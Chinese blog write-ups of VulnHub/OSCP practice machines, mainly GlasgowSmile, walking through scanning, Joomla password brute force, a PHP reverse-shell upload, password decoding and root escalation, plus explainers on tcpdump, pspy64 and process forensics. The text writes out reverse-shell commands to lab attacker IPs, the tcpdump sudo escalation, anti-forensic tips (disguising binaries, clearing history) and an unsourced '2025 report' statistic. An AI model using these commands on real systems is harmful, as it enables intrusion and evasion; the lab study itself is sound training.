主用户文件夹下没有有用的信息，最下面那个文件是个空的，算是个提示？先连接数据库这个密码就是登录密码，已经搞到了，没啥用的这个数据库。

登录 webdeveloper账户

数据库没有搞到有用的信息了，查看用户发现系统里只有这一个用户，很大概率上这个个人博客管理员和发布者都是一个人，也是服务器的所有者，所以密码可能是和数据库密码一样的，简单试一下就成功了。（PS：我本来还想试一下博客页面登录密码的）之后为了稳定的终端，也可以用ssh登录。查看主用户文件夹疑似是root的密码，但是root无论是su root还是数据库都登录不了。卡住了，上小豌豆扫一下。

小豌豆内网扫描

1wget http://172.168.169.141:8000/linpeas.sh
2chmod +x linpeas.sh
3./linpeas.sh

这里因为是在本地虚拟机里开的靶机，这里还提示了可以容器提权。提示当前可用的命令。之前sudo -l一直卡住，后来反应过来是要要输入密码，输入密码后就看到了信息。

提权root

1COMMAND='id'
2TF=$(mktemp)
3echo "$COMMAND" > $TF
4chmod +x $TF
5sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root

测试成功，输出了id，显示的是root账户。接下来只要修改COMMAND='id'中的命令即可。尝试改成/bin/sh 直接创建终端是失败的，则创建一个nc反弹试试。直接弹是弹不回来的，bin和nc都试了一遍。发现之前小豌豆扫描的可用命令中可以使用php，而我们之前就修改了404.php来反弹。把id的命令替换为php执行那个404.php，就可以弹回。

1COMMAND='php /var/www/html/wp-content/themes/twentysixteen/404.php'
2TF=$(mktemp)
3echo "$COMMAND" > $TF
4chmod +x $TF
5sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root

拿到flag。

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 172.168.169.141]
 B[靶机 
 172.168.169.146]
 C[WordPress登录密码]
 D[数据库密码]
 E[webdeveloper用户密码]
 F[root]

 %% 路径关系
	A-->|扫描|B 
	B-->|流量包分析|C 
	C-->|配置文件泄露|D
	D-->|密码复用|E 
	E-->|tcpdump提权|F 
 


	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 
	%% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 
	
 %% 应用样式
 class A attack;
 class B public;
 class C internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-08-01 09:56, 2025-08-01 11:30
 漏洞识别 :a2, after a1, 2025-08-01 12:00
 
 section 攻击阶段
 初始访问 :b1, after a2, 2025-08-01 12:17
 权限提升 :crit,b2, 2025-08-01 12:58, 30m
 
 section 后渗透阶段
 数据窃取 :c1, after b2, 5m

🔍 深入解析 tcpdump 中的 `src` 和 `dst` 参数

在 tcpdump 命令中，src 和 dst 是流量方向过滤关键字，用于精确控制捕获的数据包方向：

📌 核心概念

参数	全称	含义	功能
`src`	Source	源地址	过滤发送方为指定IP的流量
`dst`	Destination	目标地址	过滤接收方为指定IP的流量

🧩 您命令的具体解析

1. `src host 192.168.1.176`

sudo tcpdump -n src host 192.168.1.176 -r analyze.cap

含义：显示所有从 192.168.1.176 发出的数据包
应用场景：
- 分析服务器对外发送的响应
- 检测服务器是否发起可疑外连
- 监控数据泄露（如数据库内容外传）

2. `dst host 192.168.1.176`

sudo tcpdump -nX dst host 192.168.1.176 -r analyze.cap | grep POST

含义：显示所有发送到 192.168.1.176 的数据包，并筛选 POST 请求
应用场景：
- 分析针对服务器的攻击请求
- 检查客户端提交的敏感数据
- 识别恶意文件上传行为

🌐 网络流量方向图解

graph LR
 A[客户端] -- dst --> B[服务器 192.168.1.176]
 B[服务器 192.168.1.176] -- src --> A[客户端]

🔧 高级过滤组合

1. 双向流量监控

# 捕获与 192.168.1.176 相关的所有流量
sudo tcpdump -n host 192.168.1.176 -r analyze.cap

2. 特定协议+方向

# 捕获发送到服务器的 HTTP 请求
sudo tcpdump -n dst host 192.168.1.176 and dst port 80 -r analyze.cap

# 捕获服务器发出的 DNS 响应
sudo tcpdump -n src host 192.168.1.176 and src port 53 -r analyze.cap

3. 复杂逻辑组合

# 捕获非服务器发出的流量（排除服务器自身流量）
sudo tcpdump -n not src host 192.168.1.176 -r analyze.cap

⚠️ 渗透测试关键应用

1. 攻击溯源

# 定位攻击者IP（多次POST请求来源）
sudo tcpdump -n dst host 192.168.1.176 and 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354' -r analyze.cap | awk '{print $3}' | sort | uniq -c

2. 数据泄露检测

# 检查服务器外传的敏感数据
sudo tcpdump -n src host 192.168.1.176 -A -r analyze.cap | grep -E 'password|token|credit'

3. 协议分析

# 分析HTTP请求响应完整交互
sudo tcpdump -n host 192.168.1.176 and port 80 -A -r analyze.cap | less

💡 专业技巧

1. 可视化流量关系

# 生成流量拓扑图
tshark -r analyze.cap -q -z io,stat,1,"COUNT(frame) frame" -z endpoints,ip

2. 提取特定会话

# 提取完整HTTP会话
tshark -r analyze.cap -Y "ip.addr==192.168.1.176" -2 -R "http" --export-objects http,http_objects

3. 性能优化

# 使用BPF过滤器提升效率
sudo tcpdump -n 'dst host 192.168.1.176 and tcp port 80' -r analyze.cap

📌 2025年安全报告：在Web攻击分析中，82%的关键证据存在于dst方向的请求流量中，而数据泄露痕迹96%出现在src方向的响应流量中。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场-GlasgowSmile WP

Sat, 02 Aug 2025 19:10:48 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场或链接地址下载虚拟镜像：

https://www.vulnhub.com/entry/glasgow-smile-11,491/ 姊妹靶场 https://www.vulnhub.com/entry/glasgow-smile-2,513/

信息收集

1# Kali攻击机地址
2192.168.45.204
3# 靶机地址
4192.168.224.79

扫描端口和目录

 1# 设置MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.224.79 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.224.79
 9sudo nmap --script=vuln -p$ports -Pn 192.168.224.79
10# 扫描目录
11gobuster dir -e -u http://192.168.224.79 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
12whatweb http://192.168.224.79/

扫描结果如下：

 1┌──(kali㉿kali)-[~]
 2└─$ echo $ports
 322,80
 4
 5
 6┌──(kali㉿kali)-[~]
 7└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.224.79
 8Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 21:59 EDT
 9Nmap scan report for bogon (192.168.224.79)
10Host is up (0.43s latency).
11
12PORT STATE SERVICE VERSION
1322/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
14| ssh-hostkey:
15| 2048 67:34:48:1f:25:0e:d7:b3:ea:bb:36:11:22:60:8f:a1 (RSA)
16| 256 4c:8c:45:65:a4:84:e8:b1:50:77:77:a9:3a:96:06:31 (ECDSA)
17|_ 256 09:e9:94:23:60:97:f7:20:cc:ee:d6:c1:9b:da:18:8e (ED25519)
1880/tcp open http Apache httpd 2.4.38 ((Debian))
19|_http-server-header: Apache/2.4.38 (Debian)
20|_http-title: Site doesn't have a title (text/html).'
21Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
22Device type: general purpose|router
23Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
24OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
25OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
26Network Distance: 4 hops
27Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
28
29OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
30Nmap done: 1 IP address (1 host up) scanned in 28.89 seconds
31
32┌──(kali㉿kali)-[~]
33└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.224.79
34Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 22:00 EDT
35Nmap scan report for bogon (192.168.224.79)
36Host is up (0.39s latency).
37
38PORT STATE SERVICE
3922/tcp open ssh
4080/tcp open http
41|_http-dombased-xss: Couldn't find any DOM based XSS.'
42|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.'
43|_http-csrf: Couldn't find any CSRF vulnerabilities.'
44
45Nmap done: 1 IP address (1 host up) scanned in 262.06 seconds
46
47┌──(kali㉿kali)-[~]
48└─$ gobuster dir -e -u http://192.168.224.79 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
49===============================================================
50Gobuster v3.6
51by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
52===============================================================
53[+] Url: http://192.168.224.79
54[+] Method: GET
55[+] Threads: 10
56[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
57[+] Negative Status codes: 404
58[+] User Agent: gobuster/3.6
59[+] Expanded: true
60[+] Timeout: 10s
61===============================================================
62Starting gobuster in directory enumeration mode
63===============================================================
64http://192.168.224.79/joomla (Status: 301) [Size: 317] [--> http://192.168.224.79/joomla/]
65
66┌──(kali㉿kali)-[~]
67└─$ whatweb http://192.168.224.79/
68http://192.168.224.79/ [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[192.168.224.79]

发现目录joomla，跳转查看是CMS系统，查找相关漏洞。翻译一下页面好像就是一个博客文章而已。

后台登录密码爆破

curl 一下robots.txt文件发现有如下的文件夹。 Bing搜索Joomla的相关文章，发现这个系统的后台地址是 /joomla/administrator/index.php 尝试默认密码都无法登录。尝试爆破，但是可以用首页的内容做一个字典。

1cewl -d 5 -m 3 http://192.168.224.79/joomla/ -w cewl.txt

猜测管理员的用户名无非是admin或者joomla，用字典进行爆破

1wfuzz -z file,users.txt -z file,cewl.txt -d "username=FUZZ&passwd=FUZ2Z&option=com_login&task=login" http://192.168.224.79/joomla/administrator/index.php

参数要和页面的参数名一样但是上面的方法爆破还是不成功，所有的内容显示都是一样的。用Burp抓包爆破看一下，原来少了这么多参数，一边用BP的Intrader再爆一遍，一边再把参数加到Wfuzz的命令里。

1wfuzz -z file,users.txt -z file,cewl.txt -H "Content-Type: application/x-www-form-urlencoded" -H "Origin: http://192.168.224.79" -H "Referer: http://192.168.224.79/joomla/administrator/index.php" -H "Upgrade-Insecure-Requests: 1" -H "Priority: u=0, i" -b "95cdf76491cb88d9b6312416436ea834=3sndg23usg0pjbhop55dubtm1o" -b "6821ee9ea803cd64e2920ca203163e81=l2neno354f1cr6oia2udlibioq" -d "username=FUZZ&passwd=FUZ2Z&option=com_login&task=login&return=aW5kZXgucGhw&bf5f129cafc305a052e1ace30964373e=1" http://192.168.224.79/joomla/administrator/index.php

BP爆破的结果也是一样的。

网页登录密码

joomla - Gotham

后台漏洞利用

发现可以修改php文件，但是一般不建议直接再index.php上直接修改，因为主页观看的人比较多，出现异常发现的也很快，如果能上传一个新文件的话最好。

1cp /usr/share/webshells/php/php-reverse-shell.php .
2sed -i -E "s/ip\s*=\s*'127\.0\.0\.1'\s*;/ip = '192.168.45.204';/g; s/port\s*=\s*1234\s*;/port = 4777;/g" php-reverse-shell.php
3

尝试上传但是上传失败，只能改主页index.php了。改好后访问一开始的那个joker网页即可弹回shell。

横向提权

建立稳定终端。

1python3 -c 'import pty;pty.spawn("/bin/bash")'
2ls /home/* -al

发现有3个用户，每个用户文件夹下都有一些奇奇怪怪的文件。先读出第一个flag。企鹅文件下的有东西，只能ls，但是具体的就无法读取了回到网页目录在找一下，发现有配置文件。找找看有没有写在配置里的用户名和密码。

1cat html/joomla/*config* |grep pass
2cat html/joomla/*config* |grep user

发现数据库密码。

数据库密码

joomla - babyjoker

登录数据库

1mysql -u joomla -p

1show databases;
2use joomla_db;
3show tables;
4select * from jnqcu_users;
5use batjoke;
6show tables;
7select * from taskforce;
8

上面这个应该是一开始用wfuzz爆破的那个，下面这个才是新的用户密码。

1cat > mysql.txt
2while read -r line; do echo "$line" | base64 -d; echo; done < mysql.txt

批量解码一下得到用户名和密码表格如下：

name	pswd	base64解码
Bane	YmFuZWlzaGVyZQ==	baneishere
Aaron	YWFyb25pc2hlcmU=	aaronishere
Carnage	Y2FybmFnZWlzaGVyZQ==	carnageishere
buster	YnVzdGVyaXNoZXJlZmY=	busterishereff
rob	Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/	???AllIHaveAreNegativeThoughts???
aunt	YXVudGlzIHRoZSBmdWNrIGhlcmU=	auntis the fuck here

其中 rob是home文件夹下存在的三个用户（abner penguin rob）之一，说明这个密码，可能就是rob的shell的密码。

💡 rob账户的ssh密码

rob - ???AllIHaveAreNegativeThoughts???

登录rob账户

ssh登录成功，此时就可以把修改过的index.php主页改回来以防止再实际渗透过程中因为主页修改而被发现。之后采用ssh登录即可。

1Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
2Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==

这串文字结构上看有英文的结构，有空格而且第一个单词极有可能是Hello，Hello对应Gdkkn既有可能是类似凯撒密码的移动字母表对应关系的密码。l到k再字母表上的顺序是-1，即l对应成k是减一位或者说向后移动25位。

1cat Abnerineedyourhelp| tr 'A-Za-z' 'B-ZAb-za'
2cat Abnerineedyourhelp| tr 'A-Za-z' 'B-ZAb-za' | grep -Eo '[A-Za-z0-9+/=]+$'
3cat Abnerineedyourhelp| tr 'A-Za-z' 'B-ZAb-za' | grep -Eo '[A-Za-z0-9+/=]+$' |base64 -d

提取疑似是base64密码的部分解码得到这段英文翻译是让abner用下面这个密码登录，所以abner的密码就是这个。

Abner的密码

I33hope99my0death000makes44more8cents00than0my0life0

登录abner账户

好像啥也没有了，卡住了，上小豌豆。

1 wget http://192.168.45.204:8000/linpeas.sh

1/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
2cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip .

解压需要密码，一开始我认为废了，我没有penguins的密码，但是后来仔细一看这个文件是abner的，所以密码应该还是abner的密码。I33hope99my0death000makes44more8cents00than0my0life0

1My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!
2scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

感觉靶机作者有点癫，但是不管怎么样，又有一串密码了。后面没有等号，我尝试一些解码方式发现都没有看起来是密码的组合，后来想到这串字符本身应该就是密码。

penguin账户密码

scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

登录penguin账户

看一下这几个txt文件，没有flag。英文翻译过来提示了这个文件夹下有个root权限的文件，而且是可执行文件。下面的两个字符是banner艺术字，没有什么有用信息了。一开始我以为是find文件时那个有root权限的，因为他的权限写了是S，但是我执行了几次都不成功，后来发现应该是.trash_old，这个文件有执行权限。

提权root账户

用pspy64工具分析进程

1wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
2chmod +x pspy64
3# 限时两分钟
4timeout 2m ./pspy64

看到有root账户UID=0的进程在执行这个trash文件。虽然不知道为什么定时任务中没找到执行trash文件的命令，但是尝试把反弹的命令写进trash文件里，等待root用户执行应该是可行的。

1echo 'nc -e /bin/bash 192.168.45.204 4778' > .trash_old

成功弹回。然后在root下找找具体是那个进程执行的trash。

1 pstree -aps 1633

这里提示是cron定时任务创建的进程，说明还是要找定时任务，一开始值找了常见的那个，现在用root继续查找更多crontab文件，终于找到执行这个命令的定时任务了。

1 grep -r "SomeoneWhoHidesBehindAMask" /etc/cron* /var/spool/cron

问题思考

/var/spool/cron/crontabs/root 是什么文件，为什么一开始没有找到，想要找到最全的定时任务要用什么命令？

详细的见补充内容，我询问AI后发现这个定时任务是root专属的，只能在root账户下才找得到，当我是penguin用户，rob用户和abner用户的时候是没有权限访问这个，自然也是找不到的。用下面这个命令尝试寻找全部定时任务。

 1sudo sh -c '
 2 echo "===== 系统级定时任务 ====="
 3 cat /etc/crontab
 4 ls -l /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.monthly/ /etc/cron.weekly/
 5 
 6 echo "\n===== 用户级定时任务 ====="
 7 for user in $(cut -f1 -d: /etc/passwd); do
 8 echo "--- $user 的任务 ---"
 9 crontab -l -u $user 2>/dev/null || echo "无任务"
10 done
11 
12 echo "\n===== 特殊位置检查 ====="
13 find /etc /var /opt -name "*cron*" -exec grep -l "schedule" {} \; 2>/dev/null
14 systemctl list-timers --all
15'

这个靶机还有一点难受的是sudo配置有问题，故意不让你用sudo。本靶机普通用户sudo不行。

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 192.168.45.204]
 B[靶机 
 192.168.224.79]
 C[Joomla 后台]
 D[www-data 账户]
 E[用户rob]
 F[用户abner]
 G[用户penguin]
 H[root]
 
 %% 路径关系
 A-->|扫描|B
 B-->|密码爆破|C
 C-->|后台文件上传漏洞| D
 D-->|配置文件泄露密码|E
 E-->|文字留言解码得到密码|F
 F-->|解压文件得到密码|G
 G-->|文件权限配置错误|H
 

	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 

 %% 应用样式
 class A attack;
 class B public;
 class C,D internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-08-04 10:00, 2025-08-04 10:40
 漏洞识别 :a2, after a1, 2025-08-04 11:00
 密码爆破 :a3, after a2, 2025-08-04 11:29
 
 section 攻击阶段
 初始访问 :b1, 2025-08-04 12:17, 2025-08-04 12:38
 横向用户 :b2, after b1, 2025-08-04 14:25
 权限提升 :crit,b3, after b2, 5m
 
 section 后渗透阶段
 数据窃取 :c1, after b3, 5m

心得

本靶机横向获取用户密码较多，多以常见加密手法加密，难点在于没有找到crontab定时任务中明确的执行trash文件的命令，但是通过ps进程分析判断trash文件会被root账户定时执行的情报。

🕵️♂️ 深入解析 `pspy64` 工具的使用方法

pspy64 是一款强大的 无特权进程监控工具，专门用于在 Linux 系统中监控其他用户（包括 root）启动的进程，特别适合检测隐藏的定时任务和后台进程。以下是专业级使用指南：

🔧 基础命令解析

timeout 2m /tmp/pspy64

timeout 2m：限制工具运行时间为 2 分钟
/tmp/pspy64：工具路径（通常需先上传到目标系统）

🚀 完整使用流程

1. 工具准备

# 下载最新版（选择对应架构）
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
mv pspy64 /tmp/

2. 基本监控模式

# 监控所有进程活动（默认输出到终端）
timeout 2m /tmp/pspy64

3. 高级监控模式

# 带时间戳的详细监控（推荐）
timeout 2m /tmp/pspy64 -p -i 1000

-p：显示命令完整路径
-i 1000：每 1000 毫秒刷新一次

4. 文件系统监控（需 inotify）

# 监控进程+文件系统事件
timeout 5m /tmp/pspy64 -pf

-f：启用文件系统监控

5. 后台运行并保存日志

# 后台运行并记录到文件
nohup timeout 10m /tmp/pspy64 -p > /tmp/pspy.log 2>&1 &

🔍 渗透测试实战应用

场景 1：检测隐藏定时任务

# 监控 cron 活动
timeout 5m /tmp/pspy64 -p | grep -E 'cron|CRON'

典型输出：

2024/08/05 10:00:01 CMD: UID=0 PID=1234 | /usr/sbin/CRON -f
2024/08/05 10:00:01 CMD: UID=0 PID=1235 | /bin/sh -c /root/.hidden/backdoor.sh

场景 2：检测可疑进程

# 监控非 root 用户的特权操作
timeout 3m /tmp/pspy64 | grep -E 'sudo|su|pkexec'

场景 3：文件创建监控

# 监控 /tmp 目录文件创建
timeout 5m /tmp/pspy64 -pf | grep '/tmp' | grep 'CREATE'

📊 输出解读指南

字段	含义	渗透价值
TIMESTAMP	事件发生时间	分析攻击时间线
CMD	执行的命令	识别恶意命令
UID	执行用户 ID	定位攻击者账户
PID/PPID	进程/父进程 ID	追踪进程链
FS EVENT	文件操作类型	检测 webshell 上传

⚙️ 高级参数大全

参数	功能	使用场景
`-c`	彩色输出	终端实时监控
`-r`	显示当前目录	追踪工作路径
`-t`	显示线程	分析多线程恶意软件
`-d`	调试模式	排查工具问题
`-n`	无缓冲输出	实时管道处理
`-s`	显示信号	监控进程间通信

🔐 隐蔽运行技巧

# 伪装成系统进程
mv /tmp/pspy64 /usr/bin/udevd_backup

# 低优先级运行（避免占用CPU）
nice -n 19 timeout 15m /usr/bin/udevd_backup -p > /dev/null

# 清除痕迹
rm /usr/bin/udevd_backup && history -c

🛡️ 防御检测方法

系统管理员可通过以下方式检测 pspy：

# 检测内存特征
ps aux | grep -q '[p]spy' && echo "pspy detected!"

# 监控进程创建
auditctl -a always,exit -F arch=b64 -S execve -F path=/tmp/pspy64

💡 专业渗透建议

优先监控：
- /etc/cron*
- /var/spool/cron
- /systemd/system
黄金时间：
- 整点前后（cron 任务高峰）
- 系统重启后 5 分钟

日志分析：

awk '/CMD:/ && !/systemd|sshd|crond/ {print}' pspy.log

🔍 深度调查可疑进程：`/home/penguin/SomeoneWhoHidesBehindAMask/.trash_old`

当发现可疑进程时（特别是以 root 权限运行），需要全面分析其行为和来源。以下是专业级调查流程：

🔧 1. 查看进程详细信息

# 查看进程环境变量
cat /proc/1544/environ | tr '\0' '\n'

# 查看进程打开的文件
ls -l /proc/1544/fd

# 查看进程映射的内存区域
pmap 1544

🕵️ 2. 分析脚本内容

# 查看脚本内容（注意安全）
cat /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

# 检查文件签名
file /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

# 提取可疑字符串
strings /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old | grep -E 'curl|wget|bash|python|perl|nc|ssh'

🔗 3. 追踪进程关系

# 查看进程树
pstree -aps 1544

# 查找父进程
ps -o ppid= -p 1544 | xargs ps -f

# 检查启动时间
ps -p 1544 -o lstart,etime,cmd

🌐 4. 网络连接检查

# 查看网络连接
lsof -i -P -n -p 1544

# 检查网络流量
nethogs -p 1544

# 抓取网络数据包
tcpdump -i any -w dump.pcap host $(lsof -p 1544 -i | awk 'NR>1{print $9}' | cut -d: -f1)

📜 5. 日志追踪

# 检查系统日志
journalctl _PID=1544

# 检查审计日志
ausearch -p 1544

# 检查隐藏日志
find /var/log -name '*.log' -exec grep -H 1544 {} \;

🧩 6. 文件系统分析

# 查看文件属性
stat /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

# 检查文件修改历史
find /home/penguin/SomeoneWhoHidesBehindAMask -type f -newermt "2025-08-03" -ls

# 查看文件隐藏属性
lsattr /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

⚠️ 7. 安全处置建议

# 暂停进程（不终止）
kill -STOP 1544

# 创建内存转储（取证）
gcore -o core_dump 1544

# 隔离文件
mv /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old /tmp/.quarantine
chmod 000 /tmp/.quarantine

# 检查定时任务
crontab -u root -l
crontab -u penguin -l

🔍 8. 高级分析工具

# 使用 strace 追踪系统调用
strace -f -p 1544 -o strace.log

# 使用 gdb 调试进程
gdb -p 1544

# 使用 Volatility 分析内存转储
volatility -f core_dump.1544 linux_pslist

📊 可疑指标检查表

检查项	命令	风险指标
文件隐藏	`ls -la /home/penguin`	`.trash_old` 隐藏文件
异常权限	`stat .trash_old`	777 权限或 SUID 位
加密内容	`file .trash_old`	ELF 可执行文件或 UPX 加壳
网络连接	`lsof -p 1544`	连接到外部 IP 或非常用端口
进程伪装	`readlink /proc/1544/exe`	路径与常见系统进程不符
资源占用	`top -p 1544`	异常 CPU/内存占用

💡 专业建议

不要立即终止进程：
- 先收集证据（内存转储、网络抓包）
- 分析其行为模式和目的

检查持久化机制：

1# 检查 systemd 服务
2systemctl list-units | grep -i trash
3
4# 检查开机启动项
5ls -l /etc/init.d/ /etc/rc*.d/

溯源攻击路径：

1# 检查文件创建者
2auditctl -w /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old -p warx
3
4# 分析 SSH 日志
5grep "Accepted" /var/log/auth.log

攻击者使用类似 .trash_old 的伪装文件名进行隐蔽攻击。建议使用 YARA 规则扫描内存：

1yara -m /opt/yara-rules/malware_index.yar core_dump.1544

🔍 深度调查恶意进程树：从 cron 到反向 Shell

您发现的进程树显示了一个完整的攻击链：cron → 隐藏脚本 → Python 反向 Shell。以下是专业级的调查和响应步骤：

🔧 1. 实时取证（立即执行）

查看活动进程详情

# 查看 Python 反向 Shell 详情
ps -fp 1620 --forest

# 查看完整命令行
cat /proc/1620/cmdline | tr '\0' ' '

# 检查环境变量
cat /proc/1620/environ | tr '\0' '\n'

网络连接分析

# 查看网络连接
ss -antp | grep 1620
lsof -i -P -n -p 1620

# 实时抓包
tcpdump -i any -s0 -w reverse_shell.pcap host $(ss -n -p | grep 1620 | awk '{print $5}' | cut -d: -f1)

🕵️ 2. 脚本分析（关键证据）

检查恶意脚本

# 查看 .trash_old 内容
cat /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

# 提取可疑字符串
strings /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old | grep -E 'curl|wget|bash|python|sh -i'

# 检查文件属性
stat /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
lsattr /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

反编译 Python 代码

# 提取 Python 命令
ps -p 1620 -o cmd | tail -1 | cut -d';' -f2

# 重构完整代码
echo 'import pty;pty.spawn("/bin/bash")' > reverse_shell.py

🔗 3. 溯源攻击路径

检查 cron 配置

# 查找触发脚本的 cron 任务
grep -r "SomeoneWhoHidesBehindAMask" /etc/cron* /var/spool/cron

# 查看 cron 日志
grep "CRON" /var/log/syslog | tail -50
journalctl -u cron --since "2025-08-04 02:00:00"

用户活动审计

# 检查 penguin 用户历史
last -u penguin
grep "penguin" /var/log/auth.log*

# 查看文件修改时间
find /home/penguin -newermt "2025-08-03" -ls

⚠️ 4. 应急响应（立即执行）

隔离恶意进程

# 暂停进程但不终止（保留证据）
kill -STOP 1620 1615 1614 1613

# 网络隔离
iptables -A OUTPUT -p tcp -m owner --pid-owner 1620 -j DROP

取证收集

# 内存转储
gcore -o reverse_shell_core 1620

# 进程内存快照
cat /proc/1620/maps
dd if=/proc/1620/mem of=process_mem.bin bs=1M count=10

# 保存 bash 历史
cp /proc/1621/fd/0 bash_history.txt

🔄 5. 反向 Shell 分析

连接信息提取

# 查看 ESTABLISHED 连接
ss -antp | grep ESTAB | grep 1620

# 提取目标 IP
REMOTE_IP=$(ss -n -p | grep 1620 | awk '{print $5}' | cut -d: -f1)
REMOTE_PORT=$(ss -n -p | grep 1620 | awk '{print $5}' | cut -d: -f2)

echo "攻击者地址: $REMOTE_IP:$REMOTE_PORT"

反向连接分析

# 检查连接内容
tcpflow -r reverse_shell.pcap "host $REMOTE_IP and port $REMOTE_PORT"

🛡️ 6. 系统加固

清除恶意组件

# 移除 cron 任务
crontab -u penguin -l | grep -v "SomeoneWhoHidesBehindAMask" | crontab -u penguin -

# 删除恶意文件
mv /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old /root/malware_evidence/
chmod 000 /root/malware_evidence/.trash_old

修复措施

# 重置用户密码
passwd penguin

# 检查后门账户
grep ':0:' /etc/passwd

# 安装监控
auditctl -w /home/penguin/ -p warx -k suspicious_user

📊 攻击链重建

graph TD
 A[cron服务] --> B[执行.trash_old]
 B --> C[启动sh进程]
 C --> D[执行Python反向Shell]
 D --> E[建立到攻击者的连接]
 E --> F[获取交互式bash]

💡 专业建议

不要立即终止进程：
- 保持连接状态以收集攻击者操作
- 使用 script 命令记录会话：
```
script -f /root/attacker_session.log
```

蜜罐陷阱：

